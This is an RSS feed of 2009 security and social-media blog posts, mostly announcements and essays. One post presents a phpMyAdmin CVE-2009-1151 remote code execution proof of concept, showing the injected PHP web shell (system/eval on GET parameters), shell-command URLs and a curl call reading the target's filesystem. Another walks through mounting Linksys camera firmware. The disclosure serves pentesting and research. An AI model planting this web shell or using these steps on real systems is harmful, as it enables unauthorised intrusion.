<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:yt="http://gdata.youtube.com/schemas/2007" version="2.0">
   <channel>
      <title>GNUCITIZEN Network</title>
      <description>GNUCITIZEN Network</description>
      <link>http://pipes.yahoo.com/pipes/pipe.info?_id=Sn4Ffa3x3BGCYK7_nkartA</link>
      <pubDate>Fri, 10 Jul 2009 02:12:57 -0700</pubDate>
      <generator>http://pipes.yahoo.com/pipes/</generator>
      <image><link>http://www.gnucitizen.org</link><url>http://www.gnucitizen.org/images/gc-reflection-gnucitizen-inverted.png</url><title>GNUCITIZEN</title></image><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item>
         <title>Websecurify Security Scanner v0.1 Sneak Peek</title>
         <link>http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html</link>
         <description>&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_9TXLRd-gO5c/Skz1y0Yj9WI/AAAAAAAAAKY/PtvvVZtugpU/s1600-h/websecurify-tool-20090702.png"&gt;&lt;img style="cursor:pointer;cursor:hand;width:320px;height:254px;" src="http://1.bp.blogspot.com/_9TXLRd-gO5c/Skz1y0Yj9WI/AAAAAAAAAKY/PtvvVZtugpU/s320/websecurify-tool-20090702.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5353924310440605026"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;i&gt;No comments! It should be ready soon!&lt;/i&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-2382932154546319997.post-1926265366614249880</guid>
         <pubDate>Thu, 02 Jul 2009 11:00:00 -0700</pubDate>
         <media:thumbnail width="72" url="http://1.bp.blogspot.com/_9TXLRd-gO5c/Skz1y0Yj9WI/AAAAAAAAAKY/PtvvVZtugpU/s72-c/websecurify-tool-20090702.png" height="72" />
      </item>
      <item>
         <title>CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/</link>
         <description>I couldn&amp;#8217;t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it&amp;#8217;s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). All the documentation you need is in the script comments. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3254</guid>
         <pubDate>Tue, 09 Jun 2009 12:03:13 -0700</pubDate>
         <content:encoded><![CDATA[<p>I couldn&#8217;t find any public PoC/exploit for this <a rel="nofollow" target="_blank" href="http://www.phpmyadmin.net/home_page/index.php">phpMyAdmin</a> vulnerability, despite it being a serious bug affecting a popular open-source project.</p> <p>I think this vulnerability is a nice reminder that it&#8217;s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow).</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/photographi_esc_/2853937161/"><img src="http://farm4.static.flickr.com/3287/2853937161_ec3decc214.jpg?v=0" title="Broken"/></a></div> <p>All the documentation you need is in the script comments. I recommend you to go through it, before you actually run the script.</p> <p>After reading the public <a rel="nofollow" target="_blank" href="http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php">advisory</a> and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from <a rel="nofollow" target="_blank" href="http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php">advisory</a> to working attack code.</p> <p><em>I&#8217;m providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don&#8217;t be evil, it&#8217;s not worth it.</em></p> <h3>Demo</h3> <pre><code>$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh 
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/

$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester gmail.com

$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -&gt; media/cdrom
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
<em>[partial output removed for brevity reasons]</em></code></pre> <p>Contents of <code>/config/config.inc.php</code> after our evil code has been successfully injected (injected code shown in <strong>bold</strong>):</p> <pre><code>&lt;?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař &lt;michal@cihar.com&gt;
 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i = 0;

/* Server (config:root) [1] */
$i++;
$cfg[&apos;Servers&apos;][$i][&apos;host&apos;]=&apos;<strong>&apos;; if($_GET[&apos;c&apos;]){echo
&apos;&lt;pre&gt;&apos;;system($_GET[&apos;c&apos;]);echo &apos;&lt;/pre&gt;&apos;;}if($_GET[&apos;p&apos;]){echo
&apos;&lt;pre&gt;&apos;;eval($_GET[&apos;p&apos;]);echo &apos;&lt;/pre&gt;&apos;;};//</strong>&apos;] = &apos;localhost&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;extension&apos;] = &apos;mysqli&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;connect_type&apos;] = &apos;tcp&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;compress&apos;] = false;
$cfg[&apos;Servers&apos;][$i][&apos;auth_type&apos;] = &apos;config&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;user&apos;] = &apos;root&apos;; /* End of servers configuration */ ?&gt;</code></pre> <h3>Thanks</h3> <p><em>I&#8217;d like to thank <a rel="nofollow" target="_blank" href="http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/">Greg Ose</a> for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to <a rel="nofollow" target="_blank" href="http://www.milw0rm.com/">str0ke</a> for testing this PoC script and providing such useful feedback!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/MbrBV_cxDIg" height="1" 
width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Next Stage</title>
         <link>http://houseofhackers.org/2009/06/06/next-stage/</link>
         <description>We are moving forward slowly but surely. There is no need to rush though! In this post I just want to make several announcements and also mention a few important things. Before you log in for the first time in the network you need to reset your account.
The main HoH blog, the one this post is published [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=38</guid>
         <pubDate>Sat, 06 Jun 2009 02:09:09 -0700</pubDate>
         <content:encoded><![CDATA[<p>We are moving forward slowly but surely. There is no need to rush though! In this post I just want to make several announcements and also mention a few important things.</p>
<ol>
<li>Before you log in for the first time in the network you need to reset your account.</li>
<li>The main HoH blog, the one this post is published on, is open for your contributions. If you want to post stuff please do let me know.</li>
<li>I was thinking of starting a blog on HoH for random ideas for early feedback. I&#8217;ve been working on some stuff lately but it is not anywhere near finished, so a blog of that sort will give you the opportunity to share your work and get early feedback without the need to worry about the completeness of your work.</li>
<li>There were some ideas regarding setting up Jabber and perhaps an Asterisk server. I think that these are great ideas and we should definitely do that. However, we need to make sure that we&#8217;ve got good policies in place and we harden the boxes before we proceed, as the services are most likely going to be attacked once we open the doors.</li>
<li>Documents - there were suggestions on aggregating important documents or document templates that help when performing pentesting work, etc. This is a great idea. The question is how we are going to do that. The first idea is to start a blog and attach the documents per post. The second idea is to host the documents on a separate HoH domain, for example documents.houseofhackers.org or something similar. It is your call. Let&#8217;s discuss.</li>
</ol>
<p>I think that HoH can turn into a pretty cool place but we need to make it happen via small contributions from everybody. Let me know how you feel about the points above.</p>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 5)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/</link>
         <description>This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation There are many ways to mount the camera&amp;#8217;s filesystem using the firmware binary. In this post, we&amp;#8217;ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3229</guid>
         <pubDate>Fri, 05 Jun 2009 01:04:55 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN articles: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">Hacking Linksys IP Cameras (pt 2)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/">Hacking Linksys IP Cameras (pt 3)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/">Hacking Linksys IP Cameras (pt 4)</a></q>.</em></p> <h3>Mounting the filesystem on your workstation</h3> <p>There are many ways to mount the camera&#8217;s filesystem using the firmware binary. In this post, we&#8217;ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/cbs_fan/1029630568/"><img src="http://farm2.static.flickr.com/1266/1029630568_a24b2a71e3.jpg?v=0" title="Triple Cam brighted"/></a></div> <p>If you were to only use the firmware binary, things could be a bit difficult, as you don&#8217;t know the format of the binary at all. However, having the GPL firmware helps a lot as we&#8217;ll see next. I emailed Linksys back on Apr 23, 2009 informing them that although the GPL firmware was available on their site for other Linksys products, they hadn&#8217;t uploaded the one for the WVC54GCA camera. 
A few days later, on Apr 27, 2009, Linksys kindly made it available and it <a rel="nofollow" target="_blank" href="http://www.linksysbycisco.com/US/en/supportgplcode">has been available</a> ever since (the file to download is wvc54gca_v1.00R24.tgz).</p> <p>Thanks to <a rel="nofollow" target="_blank" href="http://brooknet.no-ip.com/~lex/">Lex Landa</a>&#8217;s tips I was able to figure out the parameters required to mount the firmware binary, by analysing the data contained in the <code>./scripts/wvc54gc_usa_english/combine.cfg</code> file which is included with the <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/wvc54gca_v1.00R24,5.tgz">GPL firmware</a>:</p> <pre><code>size = 00400000
file = WVC54GCA.bin
f1_name = loader
f1_start = 00000000
f2_name=loader.ver
f2_start=00007FFE
f3_name=<strong>kernel</strong>
f3_start=<strong>00020000</strong>
f4_name=<strong>filesystem</strong>
f4_start=<strong>000E0000</strong>
f5_name=PID
f5_start=003FFFB2</code></pre> <p>I simply focused on the <code>kernel</code> and <code>filesystem</code> parameters. The settings above show that the kernel starts at 0x20000 (131072 bytes / 128 KB), and the filesystem starts at 0xE0000 (917504 bytes / 896 KB). To make <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Dd_(Unix)">dd</a> start reading at 0xE0000, we need to skip 7 chunks of 131072 bytes, i.e. <code>7*131072=917504 bytes=0xE0000</code> (the position we want):</p> <pre><code>$ dd if=DYFF08-402-1024.bin bs=<strong>131072</strong> of=fs.img skip=<strong>7</strong>
25+0 records in
25+0 records out
3276800 bytes (3.3 MB) copied, 0.019424 s, 169 MB/s</code></pre> <p>We then verify that our image file is a valid <code>squashfs</code> filesystem:</p> <pre><code>$ file fs.img
fs.img:<strong> Squashfs</strong> filesystem, little endian, version 3.0, 2216311 bytes, 475 inodes, blocksize: 65536 bytes, created: Fri Nov 9 03:58:52 2007</code></pre> <p>And finally we mount it on our hard drive:</p> <pre><code>$ sudo mkdir /mnt/test
$ sudo mount -t <strong>squashfs</strong> fs.img /mnt/test -o ro,loop
$ ls /mnt/test/
bin dev etc lib mnt proc root sbin tmp usr var</code></pre>]]></content:encoded>
      </item>
      <item>
         <title>Simple and Obvious</title>
         <link>http://www.hakiri.org/blog/simple-and-obvious/</link>
         <description>When we see something that is simple and obvious we automatically assume that we can reach the same idea because after all it is simple and obvious. However, simple and obvious concepts are hard to come up with. Do not ignore the simple and the obvious. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=614</guid>
         <pubDate>Wed, 03 Jun 2009 08:23:15 -0700</pubDate>
         <content:encoded><![CDATA[<p>When we see something that is simple and obvious we automatically assume that we can reach the same idea because after all it is simple and obvious. However, simple and obvious concepts are hard to come up with.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/countrushmore/1453232544/"><img src="http://farm2.static.flickr.com/1214/1453232544_3b37471172.jpg?v=0" alt="LIVE - EVIL"/></a></div> <p><em>Do not ignore the simple and the obvious. Some of the greatest things ever invented are quite simple and rather obvious but nevertheless great and irreplaceable.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Microsoft Motion Control – The Future is Now</title>
         <link>http://www.hakiri.org/blog/microsoft-motion-control-the-future-is-now/</link>
         <description>The following is a conceptional video from Microsoft regarding their motion control system for XBox. It is a conceptional video but there are some developments towards this future today. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=609</guid>
         <pubDate>Wed, 03 Jun 2009 07:37:41 -0700</pubDate>
         <content:encoded><![CDATA[<p>The following is a conceptional video from Microsoft regarding their motion control system for XBox.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.viddler.com/simple_on_site/44771808" width="437" height="265" type="application/x-shockwave-flash" name="viddler"></iframe></div> <p><em>It is a conceptional video but there are some developments towards this future today. Tomorrow I will post a more realistic video, which shows the motion control in action.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Micro Communities</title>
         <link>http://www.hakiri.org/blog/micro-communities/</link>
         <description>I think that we are on the verge of another online change. We are going from hyper global communities, to ultra local and even micro communities. Global communities are places such as Facebook, Twitter, MySpace and all other social networks whose sole purpose is to get as many users on board as possible. They are doing well but have become significantly less helpful in the last couple of years. In other words, people find them too intrusive, too globalized and subject to abuse. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=607</guid>
         <pubDate>Thu, 28 May 2009 07:05:14 -0700</pubDate>
         <content:encoded><![CDATA[<p>I think that we are on the verge of another online change. We are going from hyper global communities, to ultra local and even micro communities.</p> <p>Global communities are places such as Facebook, Twitter, MySpace and all other social networks whose sole purpose is to get as many users on board as possible. They are doing well but have become significantly less helpful in the last couple of years. In other words, people find them too intrusive, too globalized and subject to abuse. People add friends as maniacs for no apparent reason apart from increasing their rank and apparent popularity level &#8211; a number which often means nothing to anyone.</p> <p>As a result of all of this, we see the emergence of hyper local communities where real relationships can be made; micro communities designed around very specific purposes with clearly defined goals. These communities matter as they are real. They are small but sometimes quite significant and influential.</p> <p>Needless to say, hyper local and micro communities are more secure and less subject to abuse. Simply put, when people know each other quite well a lot of technological and social related problems such as spam, fake identities, etc., become non-issues. They simply disappear. This is an interesting side-effect which is worth further exploration.</p>]]></content:encoded>
      </item>
      <item>
         <title>Building the Community from Scratch</title>
         <link>http://houseofhackers.org/2009/05/28/building-the-community-from-scratch/</link>
         <description>We are building the community pretty much from scratch: slowly but surely. There are some great ideas currently being generated and I hope we can make them happen soon.
Here is a list of a few ideas that I personally would like to see happen around HoH: Video blog - list of public domain videos on security, [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=27</guid>
         <pubDate>Thu, 28 May 2009 06:40:23 -0700</pubDate>
         <content:encoded><![CDATA[<p>We are building the community pretty much from scratch: slowly but surely. There are some great ideas currently being generated and I hope we can make them happen soon.</p>
<p>Here is a list of a few ideas that I personally would like to see happen around HoH:</p>
<ol>
<li>Video blog - list of public domain videos on security, etc; could turn into a dedicated vlog in the future</li>
<li>Podcasts - there was a lot of interest in a dedicated HoH podcast. I am not particularly good at this, so everyone who is willing to help, please let us know.</li>
<li>Professional Materials - we really want to keep this network as clean and professional as possible. This means, that we are going to have specialized sections for training, pentesting and more, dedicated to infosec professionals.</li>
</ol>
<p>So what do you say? Can we do it?</p>]]></content:encoded>
      </item>
      <item>
         <title>Information Gathering at its Greatest!</title>
         <link>http://blog.blogsecurify.com/2009/05/information-gathering-at-its-greatest.html</link>
         <description>There is a tool I've found recently that is pure genius and very innovative. It is called Maltego and is an information gathering tool that uses backends and social sites like Facebook, Twitter, blog posts and more to gather information based on the information you give it and what searches you perform. The tool will bring back graph-based search results, pulling up everything it could find on the subject, whether it be name, domain, email, DNS servers, linked sites and much, much more! This tool is a must-have for enumeration and the great part is the community edition is free! Download the community edition &lt;a rel="nofollow" target="_blank" href="http://www.paterva.com/maltego/community-edition/"&gt;here&lt;/a&gt;. If you need some help getting started you can view the video tutorials &lt;a rel="nofollow" target="_blank" href="http://www.paterva.com/maltego/screenshots/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;- &lt;i&gt;"Information is power. Information is Maltego."&lt;/i&gt;</description>
         <author>noreply@blogger.com (t3hmadhatt3r)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-3607914312507190865</guid>
         <pubDate>Tue, 19 May 2009 16:33:00 -0700</pubDate>
      </item>
      <item>
         <title>HoH Developers Group</title>
         <link>http://houseofhackers.org/2009/05/14/hoh-developers-group/</link>
         <description>This is just a quick announcement to let you know that we&amp;#8217;ve started a group dedicated to people with a development background. The idea behind the group is not only to facilitate better communication between like-minded people but also to allow people with ideas to look for development talent to be used in projects.
Like everything in HoH, [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=11</guid>
         <pubDate>Thu, 14 May 2009 14:42:37 -0700</pubDate>
         <content:encoded><![CDATA[<p>This is just a quick announcement to let you know that we&#8217;ve started a <a rel="nofollow">group</a> dedicated to people with a development background. The idea behind the group is not only to facilitate better communication between like-minded people but also to allow people with ideas to look for development talent to be used in projects.</p>
<p>Like everything in HoH, this is a community effort, i.e. a social experiment. If you want to become a member of the new HoH initiative, please let us know via our <a rel="nofollow">contact page</a>.</p>]]></content:encoded>
      </item>
      <item>
         <title>World of Warcraft and Social Media Success</title>
         <link>http://www.hakiri.org/blog/world-of-warcraft-and-social-media-success/</link>
         <description>Mashable is running an interesting article today titled 6 Things World of Warcraft Can Teach You About Social Media Success. It is about the life lessons the author of the article learned while playing WoW. I took the courtesy to summarize them all here but pay a tribute to mashable by visiting their website first. The Lessons Success requires constant dedication &amp;#8211; To succeed, you need to put in time and dedication. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=591</guid>
         <pubDate>Mon, 11 May 2009 11:54:22 -0700</pubDate>
         <content:encoded><![CDATA[<p>Mashable is running an interesting article today titled <q><a rel="nofollow" target="_blank" href="http://mashable.com/2009/05/11/world-of-warcraft-social-media/">6 Things World of Warcraft Can Teach You About Social Media Success</a></q>. It is about the life lessons the author of the article learned while playing WoW.</p> <p>I took the courtesy to summarize them all here but pay a tribute to mashable by visiting their website first.</p> <h3>The Lessons</h3> <ol>
<li><strong>Success requires constant dedication</strong> &#8211; To succeed, you need to put in time and dedication.</li>
<li><strong>It&#8217;s important to strategize your communication</strong> &#8211; If you don’t communicate effectively and clearly who you are and what you want no one will listen.</li>
<li><strong>Set an objective and develop a strategy</strong> &#8211; Do not attempt to utilize social media without any specific objective or idea on how to be successful. You will fade away because you didn’t try to participate actively in the community or just didn’t know how.</li>
<li><strong>It’s about networking</strong> &#8211; The people you connect with are incredibly important. It can mean the difference between success and failure.</li>
<li><strong>Join new services, create new lines of communication</strong> &#8211; You should always be looking to create new lines of communication and new people to interact with. Rely on these people to educate and enlighten you. Expand your horizons by trying out new things in social media.</li>
<li><strong>Earn other people’s trust</strong> &#8211; People won’t trust you until you can show them that you are to be trusted. Enough charlatans exist that you have to prove your value first before earning respect.</li>
</ol> <p>All of this reminds me of something I wanted to do for a long, long time. Let me explain. In my high school years me and my friends used to organize late evening StarCraft tournaments &#8211; nothing too obsessive, two games max per day and no more than 1-2 hours long. We used to do these tournaments for a couple of months and it was then that I noticed similarities between the strategies involved in the game and the things that we do in real life. I very rarely play strategy games these days but I&#8217;ve always wanted to summarize in a blog post or something my conclusions from my experience when I used to play.</p> <p><em>I guess now I have an incentive to finally sit and do it.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" 
href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Why Tribes, Not Money or Factories, Will Change the World</title>
         <link>http://www.hakiri.org/blog/why-tribes-not-money-or-factories-will-change-the-world/</link>
         <description>Seth Godin argues the Internet has ended mass marketing and revived a human social unit from the distant past: tribes. Founded on shared ideas and values, tribes give ordinary people the power to lead and make big change. He urges us to do so. If you watch the video you will spot the Kindle sell-out but it is an interesting presentation nevertheless. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=585</guid>
         <pubDate>Mon, 11 May 2009 10:59:37 -0700</pubDate>
         <content:encoded><![CDATA[<p>Seth Godin argues the Internet has ended mass marketing and revived a human social unit from the distant past: tribes. Founded on shared ideas and values, tribes give ordinary people the power to lead and make big change. He urges us to do so.</p> <div class="screen"> <iframe class="embeddedvideo" src="http://video.ted.com/assets/player/swf/EmbedPlayer.swf" type="application/x-shockwave-flash" width="446" height="326"></iframe></div> <p>If you watch the video you will spot the Kindle sell-out but it is an interesting presentation nevertheless. Actually, I listened to (yes, the audio version of) Seth&#8217;s book called <q>Tribes</q> and I found the whole idea quite fascinating but a bit off the ground.</p> <p><em>See the video. You might get inspired to start your own tribe.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Breaking Into a Home With an iPhone</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/0BDN8BPqizg/</link>
         <description>This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No! Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3211</guid>
         <pubDate>Mon, 11 May 2009 04:27:16 -0700</pubDate>
         <content:encoded><![CDATA[<p>This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/rJfrdcbfXsc&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" width="560" height="340"></iframe></div> <p>Got the idea? No! Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in the USA. You can either search the map or just use your GPS coordinates to get information such as price of the house, number of floors, number of rooms, pictures taken from inside the house if the house was part of any register (letting agencies etc.) before you moved in, and other interesting information.</p> <p>This is the kind of information gathering you see only in the movies. I won&#8217;t be surprised if future versions of these kinds of applications can pool even essential blueprints which show not only how the house was constructed from an architectural point of view but also show the power and gas grids and perhaps even any other wiring such as telephone, coaxial, etc.</p> <p>All of this information is also available through easily accessible APIs. Perhaps these APIs are not publicly known but anyone who can run a sniffer most certainly can get hold of the URLs and their formats. Now mash these APIs with any other tool such as one that correlates IP address to physical location (not very accurate btw) or better yet a wardriving tool and you have an infowar machine in your pocket that would make any criminal organization proud.</p> <p>This is the main purpose of my <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/for-my-next-trick-hacking-web20/">Web2.0 talk/research</a> from two years ago. 
Back then I made a very simple analogy which I would like to bring up once again. When email was invented nobody even suspected that it would be used for things such as spam and malware. That was something unimaginable. Today spam is the fastest growing criminal industry and malware delivered over email is the most successful one. In summary, we cannot foresee how a technology will be used/abused. That depends on the imagination of the people.</p> <p>The same goes for the Web2.0 meme. The more we use it, the more ways we will find to abuse it. However it is also important to say that the more we use it the more accustomed we will become to it. Therefore, when the shit hits the fan there will be very little that we can do.</p> <p><em>The reason I am bringing this up is not because I would like to start even more FUD around the Web2.0 meme but because it is time for security-aware people to stop looking into the technical aspects and start thinking in terms of technologies that affect normal people. 
Sometimes, we just lack the realism and we fail to spot the obvious problems.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>The Reason to Focus on Simplicity</title>
         <link>http://www.hakiri.org/blog/the-reason-to-focus-on-simplicity/</link>
         <description>I wrote about the importance of simplicity before but here is another reason why you should believe me. :) Keep this in mind the next time you design a service or a product. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=568</guid>
         <pubDate>Sun, 10 May 2009 07:38:49 -0700</pubDate>
         <content:encoded><![CDATA[<p>I wrote about the importance of simplicity before but here is another reason why you should believe me. :)</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/simplicity01.png"><img src="http://www.hakiri.org/static/blog/2009/05/simplicity01-300x171.png" alt="Simplicity01" title="Simplicity01" width="300" height="171" class="alignnone size-medium wp-image-572"/></a> <a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/simplicity02.png"><img src="http://www.hakiri.org/static/blog/2009/05/simplicity02-300x171.png" alt="Simplicity02" title="Simplicity02" width="300" height="171" class="alignnone size-medium wp-image-572"/></a> <a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/simplicity03.png"><img src="http://www.hakiri.org/static/blog/2009/05/simplicity03-300x171.png" alt="Simplicity03" title="Simplicity03" width="300" height="171" class="alignnone size-medium wp-image-572"/></a></div> <p><em>Keep this in mind the next time you design a service or a product. 
The simpler the better.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Social Media in Plain English</title>
         <link>http://www.hakiri.org/blog/social-media-in-plain-english/</link>
         <description>Confused information security folks (but not only) can find this video quite interesting. What I liked the most about this video is that the authors clearly explain that social media is first of all the collective contributions of ordinary people through blogs, wikis, podcasts and other social instruments combined with the efforts of other individuals and organizations who are willing to aggregate, organize and help facilitate community feedback. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=563</guid>
         <pubDate>Sun, 10 May 2009 07:17:41 -0700</pubDate>
